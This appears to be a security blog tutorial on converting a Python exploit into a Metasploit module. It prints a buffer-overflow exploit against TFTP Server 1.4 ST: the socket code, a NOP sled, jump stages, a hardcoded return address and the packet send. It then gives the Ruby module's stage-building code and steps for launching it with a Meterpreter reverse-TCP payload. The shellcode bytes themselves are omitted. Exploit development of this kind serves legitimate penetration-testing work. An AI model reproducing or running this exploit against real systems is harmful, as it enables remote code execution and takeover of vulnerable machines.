Metasploit framework is an open source project and is quite popular amongst security analysts. Most of the current exploits are written in C, Python, Perl etc. So in order to increase the reach of the well known exploits for testing purpose, it is advisable to port them into Metasploit framework. Since Metasploit became active only in 2009, many exploits are still not converted. Here this article will enlighten the readers about the conversion from other language to Metasploit framework.
To convert exploits written in python or other languages into Metasploit, we have to know the structure of the metasploit module first. The structure can be automatically generated using mona.py for any exploit type. The Immunity debugger should be installed first and afterwards the mona.py has to be put under the pycommands directory of it.
Configuring the Immunity debugger with mona
Step 1. Open the immunity debugger and type ”!mona help assemble”.
Step 2. To set the place where the exploit format file should be stored, then type “!mona config -set workingfolder d:\logs\%p”. (Create the folder logs in the d: drive)
Converting the python exploit
Consider the python exploit given below,
host = '192.168.28.130'
port = 69
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # udp connection
print "socket() failed"
#msfpayload windows/shell_bind_tcp -b \x00
# this will give you the command shell of the victim
shell = (
#Stage 3 jump back 1490 bytes to the start of buffer
#stage 2 jmp 5 bytes to make a far jump
#stage 1 return address 0x00409605 TFTFPSERVER.EXE
stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
print "file created"
mode = "netascii"
youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))
- Variable “shell” has a 330 bytes hexa codes. These hexa codes will specify the payload to be used. The buffer size here is 1490 bytes.
- In Stage 3, jump back 1490 bytes to the start of buffer
- In stage 2, jump 5 bytes to make a far jump
- In stage 1, we specify the return address 0×00409605 of TFTFPSERVER.EXE
To convert this to metasploit framework,
Step 1. From the above python exploit we came to know that the connection type is udp and it is using 69 port numbers and it is a TFTP exploit.
Step 2. For generating skeleton, type “!mona skeleton” in Immunity Debugger and press enter.
Step 3. Select the exploit type as “udp” and click OK.
Step 4. Enter the port number 69 in for the remote port and click on OK.
Step 5. Now the skeleton is generated in “d:\logs” as msfskeleton.rb which is a ruby file. Change the name of it to whatever is appropriate
Step 6. Enter the name of the author, description of the exploit, where it was found etc.
Step 7. Give the spaces as 500 under payload tab in the metasploit structure. It is the maximum size of the payload to be attached (These can be found by using the immunity debugger application).
Step 8. As we can see that a hexadecimal number is attached to the ‘stage1′ variable, which is the address that should be replaced in SIP. The address is in Big endian representation. Changing it into normal one will look like ’0×00409605′(Hexadecimal) put that into Targets array in the ruby file (in Metasploit structure).
stage << make_nops(50) + payload.encoded
stage << rand_text_alpha(1487-(payload.encoded.length+50))
stage << "\xE9\x2E\xFA\xFF\xFF"
stage << "\xEB\xF9\x90\x90"
stage << [target.ret].pack('V')
stage << "\x00"+"netascii"+"\x00"
Step 9. In the converted part make_nops (50) position means that 50 No op instructions are inserted. The payload contains the part about the action to be performed in the victim machine
Step 10. rand_text_alpha() will generate the random text of alphabets.
Step 11. We add the return address and will change the address to the format required.
Running the exploits
Step 1. Parameters to be entered are RHOST, LHOST, PAYLOAD.
Step 2. Select the payload. Let’s select windows/meterpreter/reverse_tcp
Step 3. Let’s exploit.
The exploit was tested in Windows XP SP3. To run the exploit the victim system must have “TFTP SERVER V1.4 ST”.
Metasploit code is available here.